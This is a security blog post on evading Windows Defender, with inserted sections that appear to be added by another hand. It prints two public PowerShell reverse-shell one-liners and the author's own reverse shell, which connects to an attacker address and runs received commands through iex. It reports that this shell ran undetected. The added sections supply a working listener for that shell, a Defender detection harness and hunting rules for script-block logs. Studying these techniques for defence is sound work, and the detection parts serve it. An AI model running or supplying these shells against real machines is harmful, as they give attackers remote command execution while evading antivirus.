Flying Under the AV Radar — Part 01

Ravishanka Silva
Published in InfoSec Write-ups, Dec 22, 2023 (5 min read)

After some independent research, I decided to write a series of articles on evading anti-virus software. This is the first one. It covers evading Windows Defender and obtaining a reverse shell as an attacker with PowerShell, and it shows how little effort that takes even without any complex AV evasion techniques.

Lab setup is as follows,

  • Victim — fully updated Windows 11 machine (as of 22.12.2023)
  • Attacker — Parrot Security OS

Please note that the initial payload delivery method is not discussed here. It could be any method, such as social engineering or physical intrusion.

First of all, let’s look at the current configuration of Defender on the victim Windows machine.

Real-time protection is turned on. Automatic sample submission was turned off for this PoC, since I don’t want my PoC code being submitted to Microsoft automatically.

Windows Defender detects well-known malicious scripts without hesitation. Several mechanisms may be involved, but signature-based detection is one of the key players. Defender maintains a database of known malware signatures: byte sequences, strings and other patterns that have been associated with specific malicious files, including PowerShell scripts. When Defender scans a file, or when PowerShell hands it the content of a script block through AMSI at run time, it compares that content against the database. If there is a match, the file or script is flagged as malicious.

Let’s verify this by taking the PayloadsAllTheThings PowerShell reverse shell as an example:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

It was blocked immediately by Defender.

I tried many well-known reverse shells, such as the PowerShell reverse shells from https://www.revshells.com, and they were all blocked immediately. This is one of them:

$LHOST = "10.0.0.1"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
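As an added example (not part of the original article), here is a small PowerShell harness for the two checks this section relies on: recording the Defender state that the configuration screenshot documented, and testing whether a candidate script is flagged on disk before it is ever executed. It assumes a Windows 10/11 host with the built-in Defender module (Get-MpComputerStatus, Get-MpPreference, Get-MpThreatDetection, Get-MpThreat) and MpCmdRun.exe in its default location, run from an elevated PowerShell. The EICAR test string is used as a known-detected control; the function names are this example’s own.

```powershell
# Added example: Defender state snapshot plus an on-disk detection check for candidate scripts.
# Assumes the built-in Defender cmdlets and MpCmdRun.exe; run elevated. Function names are illustrative.

function Get-DefenderPoCState {
    # Snapshot of the settings that matter for a detection test, so a result can be reproduced later.
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    [pscustomobject]@{
        RealTimeProtection   = $status.RealTimeProtectionEnabled
        AntivirusEnabled     = $status.AntivirusEnabled
        TamperProtected      = $status.IsTamperProtected
        SignatureVersion     = $status.AntivirusSignatureVersion
        SignatureLastUpdated = $status.AntivirusSignatureLastUpdated
        SubmitSamplesConsent = $pref.SubmitSamplesConsent   # 2 = never send samples
        MAPSReporting        = $pref.MAPSReporting          # 0 = cloud-delivered protection off
        PowerShellVersion    = $PSVersionTable.PSVersion.ToString()
    }
}

function Test-ScriptDetection {
    # Writes the script text to %TEMP%, scans it, and reports what Defender did and which threat name it used.
    param(
        [Parameter(Mandatory)][string]$ScriptText,
        [string]$Label = 'candidate'
    )
    $path  = Join-Path $env:TEMP ('{0}-{1}.ps1' -f $Label, [guid]::NewGuid())
    $mpcmd = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

    # Real-time protection may already act on the write itself, so tolerate a failed write.
    Set-Content -Path $path -Value $ScriptText -Encoding ASCII -ErrorAction SilentlyContinue
    Start-Sleep -Seconds 2

    # Explicit custom scan of the single file; MpCmdRun uses exit code 2 for "threat found".
    $scanExit = $null
    if (Test-Path $path) {
        & $mpcmd -Scan -ScanType 3 -File $path | Out-Null
        $scanExit = $LASTEXITCODE
    }

    # Correlate detections on this path with their threat names via ThreatID.
    $threats    = @(Get-MpThreat -ErrorAction SilentlyContinue)
    $detections = @(Get-MpThreatDetection -ErrorAction SilentlyContinue |
                    Where-Object { $_.Resources -match [regex]::Escape($path) })
    $names = foreach ($d in $detections) {
        ($threats | Where-Object { $_.ThreatID -eq $d.ThreatID }).ThreatName
    }

    [pscustomobject]@{
        Label        = $Label
        Path         = $path
        Removed      = -not (Test-Path $path)
        ScanExitCode = $scanExit
        ThreatNames  = @($names | Sort-Object -Unique)
        Detected     = ($detections.Count -gt 0)
    }
}

# Control: the EICAR test string, which every scanner must flag (Defender reports it as
# Virus:DOS/EICAR_Test_File). If this is not detected, the harness or Defender is misconfigured.
$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

Get-DefenderPoCState | Format-List
Test-ScriptDetection -ScriptText $eicar -Label 'eicar' | Format-List

# For a real candidate, read it from a file you already have:
#   Test-ScriptDetection -ScriptText (Get-Content .\heh.ps1 -Raw) -Label 'heh' | Format-List
```

Running the known shells above through Test-ScriptDetection shows the threat name Defender assigns to each, which is the quickest way to confirm that a content signature (rather than some behavioural rule) is what fired; a script that comes back with Detected = False and no threat name has simply not matched anything in the database.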

That got me thinking: if we set aside all the other detection mechanisms, how much of the work of identifying these scripts is done by signature-based detection alone?

One way to bypass signature-based detection is to use a payload that matches no known signature.

What if I were to develop my own reverse shell?

Below is a PowerShell reverse shell script I wrote:

$port = 4444
$ip = '192.168.xx.xx'

# Connect back to the listener and wrap the socket in line-oriented reader/writer objects
$socket = New-Object System.Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$reader = New-Object System.IO.StreamReader $stream
$writer = New-Object System.IO.StreamWriter $stream

# Not used by the loop below (ReadLine needs no buffer); kept as in the tested script
[byte[]]$buffer = 0..65535|%{0}

while($true){
    # One command per line; ReadLine returns $null when the listener closes the connection
    $data = $reader.ReadLine()
    if ($null -eq $data) {
        break
    }

    # Evaluate the command, capture stdout and stderr as text, and send it back
    $sendback = (iex $data 2>&1 | Out-String )
    $writer.WriteLine($sendback)
    $writer.Flush()
}

$socket.Close()
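The listener side of this exchange, as an added example that is not part of the original article: a small PowerShell stand-in for the Netcat listener, for a Windows-only lab. It speaks the same line-oriented protocol the script above expects: one command per line from the attacker side, and whatever Out-String produced coming back, terminated by WriteLine. Because the reply carries no end marker, it is collected until the stream has been quiet for a short while. The function and parameter names are this example’s own.

```powershell
# Added example: a PowerShell stand-in for a Netcat listener that drives the line-oriented shell above.
# Each command is sent as one line (the victim's ReadLine() consumes exactly one); the reply is
# collected until nothing new arrives for $QuietMs. Function and parameter names are illustrative.
function Start-PoCListener {
    param(
        [int]$Port = 4444,
        [string[]]$Commands = @('whoami', 'hostname', '(Get-Location).Path'),
        [int]$QuietMs = 1500
    )
    $listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, $Port)
    $listener.Start()
    Write-Host "Listening on 0.0.0.0:$Port ..."
    $client = $null
    try {
        $client = $listener.AcceptTcpClient()
        Write-Host "Connection from $($client.Client.RemoteEndPoint)"
        $stream = $client.GetStream()
        $writer = [System.IO.StreamWriter]::new($stream)
        $writer.AutoFlush = $true
        $buffer = New-Object byte[] 65536

        foreach ($cmd in $Commands) {
            $writer.WriteLine($cmd)
            $reply = [System.Text.StringBuilder]::new()
            $quietSince = Get-Date
            # The victim's StreamWriter emits UTF-8 without BOM; read raw bytes and decode as UTF-8.
            while (((Get-Date) - $quietSince).TotalMilliseconds -lt $QuietMs) {
                while ($stream.DataAvailable) {
                    $n = $stream.Read($buffer, 0, $buffer.Length)
                    [void]$reply.Append([System.Text.Encoding]::UTF8.GetString($buffer, 0, $n))
                    $quietSince = Get-Date
                }
                Start-Sleep -Milliseconds 50
            }
            [pscustomobject]@{ Command = $cmd; Output = $reply.ToString().TrimEnd() }
        }
    } finally {
        # Closing the socket makes the victim's ReadLine() return $null, which ends its loop.
        if ($client) { $client.Close() }
        $listener.Stop()
    }
}

Start-PoCListener -Port 4444 | Format-List
```

Run it on the attacker machine before executing heh.ps1 on the victim; each command and the text the victim returned for it is emitted as an object, and when the command list is exhausted the connection is closed, which is what makes the victim-side loop exit cleanly.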

With a Netcat listener on port 4444 on the attacker’s machine, let’s see what happens when the script above is executed on the victim machine. (The PowerShell script is saved as “heh.ps1”.)

VOILA! There are no AV detections this time, and on the attacker machine we have a working reverse shell. It’s surprising that antivirus solutions still rely so heavily on signature-based detection in 2023.

While this is far from a perfect reverse shell, it serves as a useful proof of concept: it shows how little an attacker has to do to get past Windows Defender and run commands on, or exfiltrate data from, a victim.

Without obfuscation, encryption or AMSI patching, a plain-text PowerShell reverse shell was enough. The script went through AMSI like any other script block, so Defender saw its full plaintext; it simply contained nothing that matched a signature. That is the gap this PoC points at, and it argues for detection that looks at what a script does rather than only at whether it contains known text.

This may well be the expected behaviour of standard Windows Defender. More sophisticated EDR products such as Defender for Endpoint may detect the attack described above and give organisations better protection, but what about the everyday Windows user, who is unlikely to pay for an EDR solution? Many consumers rely on the default antivirus, and in my view the scenario above calls its effectiveness against very simple defence evasion techniques into question.
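From the defender’s side, the gap described above is narrower once PowerShell script block logging is in play: PowerShell logs the script text it executes as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log (and logs blocks it considers suspicious at Warning level even when script block logging has not been enabled by policy), so a hunt can key on the combination of behaviours every one of these shells shares rather than on exact bytes. The following is an added example, not the article’s own tooling; the rule names, the flagging condition and the two constructed sample script blocks are this example’s own assumptions.

```powershell
# Added example: hunting reverse-shell-shaped script blocks by behaviour, not by exact bytes.
# Rule names, the flagging condition and the constructed samples are illustrative.
$Rules = [ordered]@{
    'tcp-connect-back' = 'Net\.Sockets\.TcpClient'
    'stream-io'        = '\.GetStream\(\)'
    'dynamic-eval'     = '\b(iex|Invoke-Expression)\b'
    'hidden-window'    = '-W(indowStyle)?\s+Hidden'
    'policy-bypass'    = '-Exec(utionPolicy)?\s+Bypass'
}

function Test-ReverseShellIndicators {
    # Returns the matching rule names; a block is flagged when it both opens a socket and evals input.
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    $hits = @(foreach ($name in $Rules.Keys) {
        if ($ScriptBlockText -match $Rules[$name]) { $name }
    })
    [pscustomobject]@{
        Flagged = ($hits -contains 'tcp-connect-back') -and ($hits -contains 'dynamic-eval')
        Rules   = $hits
    }
}

function Find-SuspiciousScriptBlocks {
    # Live variant: pulls 4104 events and runs the same test. Needs rights to read the Operational log.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value     # ScriptBlockText
            $r = Test-ReverseShellIndicators -ScriptBlockText $text
            if ($r.Flagged) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time   = $_.TimeCreated
                    Level  = $_.LevelDisplayName
                    Rules  = $r.Rules -join ','
                    Sample = $flat.Substring(0, [Math]::Min(80, $flat.Length))
                }
            }
        }
}

# Constructed samples (not real log data): a benign block and a block shaped like the shell above.
$Samples = [ordered]@{
    benign = '$r = Invoke-RestMethod https://example.invalid/status; $r.ok'
    shell  = '$s = New-Object System.Net.Sockets.TcpClient($ip,$port); $st = $s.GetStream(); $rd = New-Object System.IO.StreamReader $st; while($true){ $d = $rd.ReadLine(); iex $d }'
}
foreach ($k in $Samples.Keys) {
    $r = Test-ReverseShellIndicators -ScriptBlockText $Samples[$k]
    '{0,-6} flagged={1,-5} rules={2}' -f $k, $r.Flagged, ($r.Rules -join ',')
}

# Then against the real log on the victim:
#   Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```

The point of the rule set is that it matches the author’s own script as readily as the PayloadsAllTheThings and revshells variants, because all three connect back with TcpClient and feed received text to iex; renaming variables or restructuring the loop does not change that. Script block logging is forced on by the EnableScriptBlockLogging value under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging (or the equivalent Group Policy), which is worth enabling on any machine where this kind of hunt is expected to work reliably.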

Note: This content is for educational purposes only. Please refrain from using this information to cause harm or engage in any malicious activities.

I decided to bring this up with Microsoft, not expecting a bounty but to check whether this is the expected behaviour of Defender. Their reply was: “We determined your finding is valid but does not meet our bar for immediate servicing as it is a low severity security feature bypass. However, we’ve marked your finding for future review as an opportunity to improve our products.”

If you have any thoughts or comments, please don’t hesitate to reach out to me via LinkedIn.
